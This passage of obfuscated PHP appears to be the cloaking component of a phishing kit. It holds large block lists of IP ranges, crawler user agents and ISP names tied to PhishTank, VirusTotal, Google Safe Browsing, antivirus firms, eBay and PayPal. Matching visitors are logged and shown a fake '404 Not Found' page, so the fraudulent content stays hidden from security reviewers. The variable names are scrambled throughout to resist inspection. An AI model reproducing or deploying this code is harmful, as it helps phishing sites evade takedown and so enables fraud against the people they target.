","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","68.65.53.71","^198.25.*.*","^64.106.213.*","^91.103.66.*","^208.91.115.*","^199.30.228.*","^66.102.*.*","^104.236.153.*","^65.55.85.12","^66.211.169.3","^66.211.169.66","^89.163.159.214","^37.128.131.171","^12.148.196.*","^193.220.178.*","^68.65.53.71","^198.25.*.*","^64.106.213.*","^104.108.64.175","104.83.233.198","^173.194.116.102","^173.194.112.*","^65.55.206.154","^193.221.113.53","^208.76.45.53","^208.84.*.*","^207.46.8.167","^65.54.188.110","^207.46.8.199","^134.170.2.199","^65.55.92.152","^65.54.188.94","^65.55.37.104","^65.55.92.168","^65.55.37.120","^65.55.33.119","^65.55.92.184","^65.54.188.126","^65.55.37.88","^65.55.37.88","^65.55.92.136","^207.46.8.199","^65.55.92.168","^65.54.188.94","^65.55.33.119","^65.55.37.104","^65.54.188.110","^1.128.96.181","^65.208.151.*","^1.132.97.75","^1.152.96.223","^38.100.*.*","^185.20.5.*","^185.20.4.*","^95.76.156.*","^216.58.211.37","^173.194.116.149","^107.170.*.*","^64.68.90.*","^64.233.173.*","^216.33.229.163","^216.239.*.*","^89.163.159.214","^149.20.*.*","^219.117.238.170","^79.79.148.223","^62.149.225.67","^104.131.165.123","^46.101.249.238","^79.79.147.162","^178.62.113.173","^1.152.97.32","^101.174.147.73","27.54.62.91","4.14.64.*","^38.105.*.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","^68.65.53.71","^64.235.153.*","^64.235.154.*","^198.25.*.*","^64.106.213.*","54.228.218.117","^54.228.218.*","185.28.20.243","^185.28.20.*","217.16.26.166","162.224.156.32","^204.101.161.159","^217.16.26.*","^216.162.209.*","^64.71.193.*","^185.75.141.32","^209.66.70.*","^207.70.60.*","^209.19.185.*","^209.*","^104.236.153.*","^107.170.*.*","^109.186.*.*","^12.148.196.*","^12.148.209.*","^128.242.*.*","^131.212.*.*","^149.20.*.*","^158.108.*.*","^163.195.178.*","^167.24.*.*","^168.188.*.*","^173.194.*.*","^173.224.160.*","^173.224.161.*","^173.224.162.*","^173.224.163.*","^173.224.164.*","^173.224.165.*","^173.224.166.*","^173.224.167.*","^184.173.*.*","^192.115.134.*","^192.118.48.*","^193.220.178.*","^193.253.199.*","^193.47.80.*","^194.52.68.*","^194.72.238.*","^194.90.*.*","^198.25.*.*","^198.54.*.*","^199.30.228.*","^202.108.252.*","^204.14.48.*","^206.28.72.*","^207.126.144.*","^208.65.144.*","^208.91.115.*","^209.73.228.*","^209.85.*.*","^209.85.128.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^212.29.192.*","^212.29.224.*","^212.50.193.*","^216.10.193.*","^216.239.32.*","^216.252.167.*","^217.132.*.*","^217.132.*.*","^38.100.*.*","^38.100.*.*","^38.105.*.*","^38.144.36.*","^46.116.*.* ","^50.7.*.*","^50.97.*.*","^54.176.*.*","^62.116.207.*","^62.90.*.*","^64.106.213.*","^64.124.14.*","^64.18.*.*","^64.233.160.*","^64.27.2.*","^64.37.103.*","^64.62.136.*","^64.62.175.*","^66.102.*.*","^66.102.*.*","^66.135.200.*","^66.150.14.*","^66.205.64.*","^66.207.120.*","^66.221.*.*","^66.249.*.*","^67.15.*.*","^67.209.128.*","^68.65.53.71","^69.61.12.*","^69.65.*.*","^72.14.192.*","^72.14.192.*","^74.125.*.*","^74.125.*.*","^74.125.*.*","^81.161.59.*","^82.166.*.*","^85.250.*.*","^85.64.*.*","^89.138.*.*","^89.138.*.*","^91.103.66.*","^93.172.*.*","^95.76.156.*","^64.71.*.*","^203.188.221.*","^209.19.186.231","^206.207.80.*","^209.19.*.*","^206.80.*.*","^207.80.*.*","^207.70.60.*","^108.210.106.*","^173.14.18.*","^52.90.*.*","^35.172.115.*","^54.164.*.*","^222.154.252.*","^195.211.23.*","^13.57.36.*","^210.55.200.*","^42.112.8.*","^87.112.174.*");if(${${"GLOBALS"}["lxisjowdnr"]}["block_iprange"]=="on"){foreach(${${"GLOBALS"}["izikllqxp"]} as${${"GLOBALS"}["rumyugklv"]}){if(preg_match("/".${${"GLOBALS"}["rumyugklv"]}."/",$_SERVER["REMOTE_ADDR"])){$zhwmpb="file";${"GLOBALS"}["kiyqxxbe"]="ip";${${"GLOBALS"}["rumyugklv"]}=getenv("REMOTE_ADDR");${$zhwmpb}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED BY IP || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["kiyqxxbe"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");$uabeeykrcgnv="click";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip (Detect by IP Range)"."
");fclose(${$uabeeykrcgnv});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}}}${$tmpebarbeg}=strtolower($_SERVER["HTTP_USER_AGENT"]);${${"GLOBALS"}["dyguiesxygdd"]}=array("bot","above","google","docomo","mediapartners","phantomjs","lighthouse","reverseshorturl","samsung-sgh-e250","softlayer","amazonaws","cyveillance","crawler","gsa-crawler","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit","apache-httpclient","lssrocketcrawler","crawler","urlredirectresolver","jetbrains","spam","windows 95","windows 98","acunetix","netsparker","007ac9","008","Feedfetcher","192.comagent","200pleasebot","360spider","4seohuntbot","50.nu","a6-indexer","admantx","amznkassocbot","aboundexbot","aboutusbot","abrave spider","accelobot","acoonbot","addthis.com","adsbot-google","ahrefsbot","alexabot","amagit.com","analytics","antbot","apercite","aportworm","EBAY","CL0NA","jabber","ebay","arabot","hotmail!","msn!","baidu","outlook!","outlook","msn","duckduckbot","hotmail","go-http-client","go-http-client/1.1","trident","presto","virustotal","unchaos","dreampassport","sygol","nutch","privoxy","zipcommander","neofonie","abacho","acoi","acoon","adaxas","agada","aladin","alkaline","amibot","anonymizer","aplix","aspseek","avant","baboom","anzwers","anzwerscrawl","crawlconvera","del.icio.us","camehttps","annotate","wapproxy","translate","feedfetcher","ask24","asked","askaboutoil","fangcrawl","amzn_assoc","bingpreview","dr.web","drweb","bilbo","blackwidow","sogou","sogou-test-spider","exabot","externalhit","ia_archiver","googletranslate","translate","proxy","dalvik","quicklook","seamonkey","sylera","safebrowsing","safesurfingwidget","preview","whatsapp","telegram","instagram","zteopen","icoreservice");if(${${"GLOBALS"}["jpjpvwpw"]}["block_ua"]=="on"){foreach(${${"GLOBALS"}["birblobfl"]} as${${"GLOBALS"}["lvulipkb"]}){${"GLOBALS"}["pyguhckbc"]="dp";${"GLOBALS"}["dywvmdugwtp"]="dp";$esaybqcxm="dp";if(substr_count(${${"GLOBALS"}["dywvmdugwtp"]},strtolower(${${"GLOBALS"}["lvulipkb"]}))>0 or${${"GLOBALS"}["tgaounod"]}==""or${${"GLOBALS"}["pyguhckbc"]}==" "or${$esaybqcxm}=="    "){$gymskbtvtoh="click";$sxoegaohxksp="file";${${"GLOBALS"}["rumyugklv"]}=getenv("REMOTE_ADDR");${$sxoegaohxksp}=fopen("block_bot.txt","a");$sgfyjamvnvf="click";fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED BY USER AGENT || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["rumyugklv"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$gymskbtvtoh}=fopen("logs/total_bot.txt","a");fwrite(${$sgfyjamvnvf},"$ip (Detect by USERAGENT)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>");}}}${${"GLOBALS"}["lfkvcyf"]}=array("abot","dbot","ebot","hbot","kbot","lbot","mbot","nbot","obot","pbot","rbot","sbot","tbot","vbot","ybot","zbot","bot.","bot/","_bot",".bot","/bot","-bot",":bot","(bot","crawl","slurp","spider","seek","avg","avira","bitdefender","kaspersky","sophos","virustotal","virus","accoona","acoon","adressendeutschland","ah-ha.com","ahoy","altavista","ananzi","anthill","appie","arachnophilia","arale","araneo","aranha","architext","aretha","arks","asterias","atlocal","atn","atomz","augurfind","backrub","bannana_bot","baypup","bdfetch","big brother","biglotron","bjaaland","blackwidow","blaiz","blog","blo.","bloodhound","boitho","booch","bradley","butterfly","calif","cassandra","ccubee","cfetch","charlotte","churl","cienciaficcion","cmc","collective","comagent","combine","computingsite","csci","curl","cusco","daumoa","deepindex","delorie","depspid","deweb","die blinde kuh","digger","ditto","dmoz","docomo","download express","dtaagent","dwcp","ebiness","ebingbong","e-collector","ejupiter","emacs-w3 search engine","esther","evliya celebi","ezresult","falcon","felix ide","ferret","fetchrover","fido","findlinks","fireball","fish search","fouineur","funnelweb","gazz","gcreep","genieknows","getterroboplus","geturl","glx","goforit","golem","grabber","grapnel","gralon","griffon","gromit","grub","gulliver","hamahakki","harvest","havindex","helix","heritrix","hku www octopus","homerweb","htdig","html index","html_analyzer","htmlgobble","hubater","hyper-decontextualizer","ia_archiver","ibm_planetwide","ichiro","iconsurf","iltrovatore","image.kapsi.net","imagelock","incywincy","indexer","infobee","informant","ingrid","inktomisearch.com","inspector web","intelliagent","internet shinchakubin","ip3000","iron33","israeli-search","ivia","jack","jakarta","javabee","jetbot","jumpstation","katipo","kdd-explorer","kilroy","knowledge","kototoi","kretrieve","labelgrabber","lachesis","larbin","legs","libwww","linkalarm","link validator","linkscan","lockon","lwp","lycos","magpie","mantraagent","mapoftheinternet","marvin/","mattie","mediafox","mediapartners","mercator","merzscope","microsoft url control","minirank","miva","mj12","mnogosearch","moget","monster","moose","motor","multitext","muncher","muscatferret","mwd.search","myweb","najdi","nameprotect","nationaldirectory","nazilla","ncsa beta","nec-meshexplorer","nederland.zoek","netcarta webmap engine","netmechanic","netresearchserver","netscoop","newscan-online","nhse","nokia6682/","nomad","noyona","siteexplorer","nutch","nzexplorer","objectssearch","occam","omni","open text","openfind","openintelligencedata","orb search","osis-project","pack rat","pageboy","pagebull","page_verifier","panscient","parasite","partnersite","patric","pear.","pegasus","peregrinator","pgp key agent","phantom","phpdig","picosearch","piltdownman","pimptrain","pinpoint","pioneer","piranha","plumtreewebaccessor","pogodak","poirot","pompos","poppelsdorf","poppi","popular iconoclast","psycheclone","publisher","python","rambler","raven search","roach","road runner","roadhouse","robbie","robofox","robozilla","rules","salty","sbider","scooter","scoutjet","scrubby","search.","searchprocess","semanticdiscovery","senrigan","sg-scout","shai'hulud","shark","shopwiki","sidewinder","sift","silk","simmany","site searcher","site valet","sitetech-rover","skymob.com","sleek","smartwit","sna-","snappy","snooper","sohu","speedfind","sphere","sphider","spinner","spyder","steeler/","suke","suntek","supersnooper","surfnomore","sven","sygol","szukacz","tach black widow","tarantula","templeton","/teoma","t-h-u-n-d-e-r-s-t-o-n-e","theophrastus","titan","titin","tkwww","toutatis","t-rex","tutorgig","twiceler","twisted","ucsd","udmsearch","url check","updated","vagabondo","valkyrie","verticrawl","victoria","vision-search","volcano","voyager/","voyager-hc","w3c_validator","w3m2","w3mir","walker","wallpaper","wanderer","wauuu","wavefire","web core","web hopper","web wombat","webbandit","webcatcher","webcopy","webfoot","weblayers","weblinker","weblog monitor","webmirror","webmonkey","webquest","webreaper","websitepulse","websnarf","webstolperer","webvac","webwalk","webwatch","webwombat","webzinger","wget","whizbang","whowhere","wild ferret","worldlight","wwwc","wwwster","xenu","xget","xift","xirq","yandex","yanga","yeti","yodao","zao/","zippp","zyborg","proximic","Googlebot","Baiduspider","Cliqzbot","A6-Indexer","AhrefsBot","Genieo","BomboraBot","CCBot","URLAppendBot","DomainAppender","msnbot-media","Antivirus","YoudaoBot","MJ12bot","linkdexbot","Go-http-client","presto","BingPreview","go-http-client","go-http-client/1.1","trident","presto","virustotal","unchaos","dreampassport","sygol","nutch","privoxy","zipcommander","neofonie","abacho","acoi","acoon","adaxas","agada","aladin","alkaline","amibot","anonymizer","aplix","aspseek","avant","baboom","anzwers","anzwerscrawl","crawlconvera","del.icio.us","camehttps","annotate","wapproxy","translate","feedfetcher","ask24","asked","askaboutoil","fangcrawl","amzn_assoc","bingpreview","dr.web","drweb","bilbo","blackwidow","sogou","sogou-test-spider","exabot","externalhit","ia_archiver","mj12","okhttp","simplepie","curl","wget","virus","pipes","antivirus","python","ruby","avast","firebird","scmguard","adsbot","weblight","favicon","analytics","insights","headless","github","node","agusescan","zteopen","majestic12","SimplePie","SAMSUNG-SGH-E250","DoCoMo/2.0 N905i","SiteLockSpider","okhttp/2.5.0","ips-agent","scoutjet","UptimeRobot","FM Scene","Prevx");if(${${"GLOBALS"}["lxisjowdnr"]}["block_ua"]=="on"){foreach(${${"GLOBALS"}["lfkvcyf"]} as${${"GLOBALS"}["xrcepkdetfk"]}){${"GLOBALS"}["jmwixwdqijl"]="BotType";if(stripos($_SERVER["HTTP_USER_AGENT"],${${"GLOBALS"}["jmwixwdqijl"]})!==false){$qdtnbatk="ip";${"GLOBALS"}["hypnnyratw"]="file";$lycifppjngt="click";${$qdtnbatk}=getenv("REMOTE_ADDR");${${"GLOBALS"}["hypnnyratw"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED BY USER AGENT || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["rumyugklv"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip (Detect by USERAGENT)"."
");fclose(${$lycifppjngt});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}}}if(${${"GLOBALS"}["jxybbeftqwh"]}["block_iprange"]=="on"){include"block3.php";}if(${$votjwqxs}["block_vpn"]=="on"){include"proxyblock.php";}if(${${"GLOBALS"}["lxisjowdnr"]}["onetime"]=="on"){include"onetime.php";}function getOSsss(){$psiyedzgob="user_agent";${"GLOBALS"}["ediphzzsv"]="os_platform";${$psiyedzgob}=$_SERVER["HTTP_USER_AGENT"];$crizcq="os_array";${${"GLOBALS"}["titqmlcva"]}="Unknown OS Platform";${"GLOBALS"}["ieyxqj"]="value";${$crizcq}=array("/windows nt 10/i"=>"Windows 10","/windows nt 6.3/i"=>"Windows 8.1","/windows nt 6.2/i"=>"Windows 8","/windows nt 6.1/i"=>"Windows 7","/windows nt 6.0/i"=>"Windows Vista","/windows nt 5.2/i"=>"Windows Server 2003/XP x64","/windows nt 5.1/i"=>"Windows XP","/windows xp/i"=>"Windows XP","/windows nt 5.0/i"=>"Windows 2000","/windows me/i"=>"Windows ME","/win98/i"=>"Windows 98","/win95/i"=>"Windows 95","/win16/i"=>"Windows 3.11","/macintosh|mac os x/i"=>"Mac OS X","/mac_powerpc/i"=>"Mac OS 9","/linux/i"=>"Linux","/ubuntu/i"=>"Ubuntu","/iphone/i"=>"iPhone","/ipod/i"=>"iPod","/ipad/i"=>"iPad","/android/i"=>"Android","/cros/i"=>"Chrome OS","/blackberry/i"=>"BlackBerry","/webos/i"=>"Mobile");${"GLOBALS"}["ihdiuwhh"]="os_array";foreach(${${"GLOBALS"}["ihdiuwhh"]} as${${"GLOBALS"}["vnlyszxsksem"]}=>${${"GLOBALS"}["ieyxqj"]}){if(preg_match(${${"GLOBALS"}["vnlyszxsksem"]},${${"GLOBALS"}["wlpdngygwrd"]})){${${"GLOBALS"}["titqmlcva"]}=${${"GLOBALS"}["iiydyedj"]};}}return${${"GLOBALS"}["ediphzzsv"]};}${"GLOBALS"}["legzvualb"]="os";$sxbppaafqhl="ip2";${$puflbehsjnvp}=getOSsss();function getBrowsersss(){${"GLOBALS"}["tnrdtrwi"]="browser_array";${"GLOBALS"}["wiepnbiaqp"]="regex";${${"GLOBALS"}["wlpdngygwrd"]}=$_SERVER["HTTP_USER_AGENT"];${"GLOBALS"}["roylxnmmw"]="browser";${${"GLOBALS"}["dgwtelaz"]}="Unknown Browser";${${"GLOBALS"}["dixfts"]}=array("/msie/i"=>"Internet Explorer","/firefox/i"=>"Firefox","/safari/i"=>"Safari","/chrome/i"=>"Chrome","/opera/i"=>"Opera","/netscape/i"=>"Netscape","/maxthon/i"=>"Maxthon","/konqueror/i"=>"Konqueror","/mobile/i"=>"Handheld Browser");foreach(${${"GLOBALS"}["tnrdtrwi"]} as${${"GLOBALS"}["wiepnbiaqp"]}=>${${"GLOBALS"}["iiydyedj"]}){$fhklktm="regex";if(preg_match(${$fhklktm},${${"GLOBALS"}["wlpdngygwrd"]})){$ncvntdvyyfs="value";$rkdefynzq="browser";${$rkdefynzq}=${$ncvntdvyyfs};}}return${${"GLOBALS"}["roylxnmmw"]};}${${"GLOBALS"}["qiqzxvb"]}=getBrowsersss();function getisp($ip){${"GLOBALS"}["dxnmado"]="getip";${"GLOBALS"}["uyvbtvle"]="ip";$cgxuyif="content";${${"GLOBALS"}["dxnmado"]}="http://extreme-ip-lookup.com/json/".${${"GLOBALS"}["uyvbtvle"]};${${"GLOBALS"}["gvmmopj"]}=curl_init();curl_setopt(${${"GLOBALS"}["gvmmopj"]},CURLOPT_URL,${${"GLOBALS"}["lsfplw"]});$vjpwxsavfkq="curl";$qxryyxzxdt="curl";${"GLOBALS"}["xyrnptk"]="curl";curl_setopt(${${"GLOBALS"}["gvmmopj"]},CURLOPT_RETURNTRANSFER,true);curl_setopt(${$qxryyxzxdt},CURLOPT_FOLLOWLOCATION,true);${${"GLOBALS"}["riuxseld"]}=curl_exec(${$vjpwxsavfkq});curl_close(${${"GLOBALS"}["xyrnptk"]});${${"GLOBALS"}["fxxcbkjwoq"]}=json_decode(${$cgxuyif});return$details->org;}${$ekmduw}=getisp(${${"GLOBALS"}["yjwxdx"]});${${"GLOBALS"}["vgircypvt"]}=array("Peak 10","Quasi Networks LTD","SC Rusnano","GoDaddy.com, LLC","Server Plan S.r.l.","Linode","Blazing SEO","Lixux OU","Inter Connects Inc","Flokinet Ltd","LukMAN Multimedia Sp. z o.o","PIPEX-BLOCK1","IPVanish","LinkGrid LLC","Snab-Inform Private Enterprise","Cisco Systems","Network and Information Technology Limited","London Wires Ltd.","Tehnologii Budushego LLC","Eonix Corporation","hosttech GmbH","Wowrack.com","SunGard Availability Services LP","Internap Network Services Corporation","Palo Alto Networks","PlusNet Technologies Ltd","Scaleway","Facebook","Host1Plus","XO Communications","Nobis Technology Group","ExpressVPN","DME Hosting LLC","Prescient Software","Sungard Network Solutions","OVH SAS","Iomart Hosting Ltd","Hosting Solution","Barracuda Networks","Sungard Network Solutions","Solar VPS","PHPNET Hosting Services","DigitalOcean","Level 3 Communications","softlayer","SoftLayer Technologies","Complete Internet Access","london-tor.mooo.com","amazonaws","cyveillance","phishtank","tor.piratenpartei-nrw.de","cpanel66.proisp.no","tor-node.com","dreamhost","Involta","exit0.liskov.tor-relays.net","tor.tocici.com","netpilot","calyxinstitute","tor-exit","msnbot","p3pwgdsn","netcraft","University of Virginia","trendmicro","ebay","paypal","torservers","comodo","EGIHosting","ebbs.healingpathsolutions.com","healingpathsolutions.com","Solution Pro","Zayo Bandwidth","spider.clicktargetdevelopment.com","clicktargetdevelopment.com","static.spro.net","Digital Ocean","Internap Network Services Corporation","Blue Coat Systems","GANDI SAS","roamsite.com","PIPEX-BLOCK1","ColoUp","Westnet","The University of Tokyo","University","University of","QuadraNet","exit-01a.noisetor.net","noisetor.net","noisetor","vultr.com","Zscaler","Choopa","RedSwitches Pty","Quintex Alliance Consulting","www16.mailshell.com","this.is.a.tor.exit-node.net","this.is.a.tor.node.xmission.com","colocrossing.com","DedFiberCo","crawl","sucuri.net","crawler","proxy","enom","cloudflare","yahoo","trustwave","rima-tde.net","tfbnw.net","pacbell.net","tpnet.pl","ovh.net","centralnic","badware","phishing","antivirus","SiteAdvisor","McAfee","Bitdefender","avirasoft","phishtank.com","googleusercontent","OVH SAS","Yahoo","Yahoo! Inc.","Google","Google Inc.","GoDaddy","Amazon Technologies Inc.","Amazon","Top Level Hosting SRL","Twitter","Microsoft","Microsoft Corporation","OVH","VPSmalaysia.com.my","Madgenius.com","Barracuda Networks Inc.","Barracuda","SecuredConnectivity.net","Digital Domain","Hetzner Online","Akamai","SoftLayer","SURFnet","Creative Thought Inc.","Fastly","Return Path Inc.","WhatsApp","Instagram","Schulte Consulting LLC","Universidade Federal do Rio de Janeiro","Sectoor","Bitfolk","DIR A/S","Team Technologies LLC","Mainloop","Junk Email Filter Inc.","Art Matrix - Lightlink Inc.","Redpill Linpro AS","CloudFlare","ESET spol. s r.o.","AVAST Software s.r.o.","Dosarrest","Apple Inc.","Symantec","Mozilla","Netprotect SRL","Host Europe GmbH","Host Sailor Ltd.","PSINet Inc.","Daniel James Austin","RamNode","Hostalia","Xs4all Internet BV","Inktomi Corporation","Eircom Customer Assignment","9New Network Inc","Sony","Private IP Address LAN","Computer Problem Solving","Fortinet","Avira","Rackspace","Baidu","Comodo","Incapsula Inc","Orange Polska Spolka Akcyjna","Infosphere","Private Customer","SurfControl","University of Newcastle upon Tyne","Total Server Solutions","LukMAN","eSecureData","Hosting","VI Na Host Co. Ltd","B2 Net Solutions","Master Internet","Global Perfomance","Fireeye","AntiVirus","Security","Intersoft Internet","Voxility","Linode","Internet-Pro","Trustwave Holdings Inc","Online SAS","Versaweb","Liquid Web","A100 ROW","Apexis AG","Apexis","LogicWeb","Virtual1 Limited","VNET a.s.","Static IP Assignment","TerraTransit AG","Merit Network","PathsConnect","Long Thrive","LG DACOM","Secure Internet","Kaspersky","UK Dedicated Servers Limited","Customer Network","Flokinet","Simpli Networks LLC","Psychz","PrivateSystems Networks","ScanSafe Services","CachedNet","CloudVPN","Spark New Zealand Trading Ltd","Whitelabel IT Solutions Corp","Hostwinds","Hosteros LLC","HostUS","Host","ClientID","Server","Oracle","Fortinet","Unus Inc.","Public facing services","Virtual Employee Pvt Ltd","Dataline Ltd","Teksavvy Solutions Inc.","UPC Romania Bucuresti","TalkTalk Communications Limited","British Telecommunications PLC","Global Data Networks LLC","Quintex Alliance Consulting","Online S.A.S.","Content Delivery Network Ltd","Nobis Technology Group LLC","Parrukatu","JSC ER-Telecom Holding","ChinaNet Fujian Province Network","QualityNetwork","Vist On-Line Ltd","The Calyx Institute","Internet Customers","OJSC Oao Tattelecom","Petersburg Internet Network Ltd.","Psychz Networks","Udasha","Onavo Mobile Ltd");if(${${"GLOBALS"}["lxisjowdnr"]}["block_isp"]=="on"){$scbucib="isps";foreach(${${"GLOBALS"}["vgircypvt"]} as${$scbucib}){$fskuxbuk="ispnya";${"GLOBALS"}["uqsoymhtte"]="isps";if(substr_count(${$fskuxbuk},${${"GLOBALS"}["uqsoymhtte"]})>0){${"GLOBALS"}["qiygdujtquf"]="click";$uixiwms="file";${"GLOBALS"}["gonpimof"]="click";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");${"GLOBALS"}["hsgyyxrtv"]="ip";fwrite(${$uixiwms}," BLOCKED ISP || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["hsgyyxrtv"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["qiygdujtquf"]},"$ip (Detect by ISP)"."
");fclose(${${"GLOBALS"}["gonpimof"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}}}if(${${"GLOBALS"}["emnvrcgr"]}=="92.23.57.168"or${${"GLOBALS"}["emnvrcgr"]}=="96.31.1.4"or${$sxbppaafqhl}=="207.96.148.8"){$hnzvpu="file";$dbjhame="ip2";${"GLOBALS"}["vvvspebmic"]="file";${${"GLOBALS"}["vvvspebmic"]}=fopen("block_bot.txt","a");fwrite(${$hnzvpu}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$dbjhame}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Windows Server 2003/XP x64"and${${"GLOBALS"}["qiqzxvb"]}=="Firefox"){$gmjvpdggy="file";$xrpywpov="ip2";$jvkcezy="click";$obpgljb="click";${$gmjvpdggy}=fopen("block_bot.txt","a");${"GLOBALS"}["rlmytsdbhqj"]="file";${"GLOBALS"}["kapxoyh"]="click";fwrite(${${"GLOBALS"}["rlmytsdbhqj"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$xrpywpov}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["kapxoyh"]}=fopen("logs/total_bot.txt","a");fwrite(${$jvkcezy},"$ip2 (Google Safebrowsing)"."
");fclose(${$obpgljb});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${$qeegojfjfnu}=="Windows XP"and${${"GLOBALS"}["qiqzxvb"]}=="Firefox"){${"GLOBALS"}["knpocrqbp"]="file";$tygrcupvst="file";${$tygrcupvst}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["knpocrqbp"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["emnvrcgr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${"GLOBALS"}["mjtuckh"]="click";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
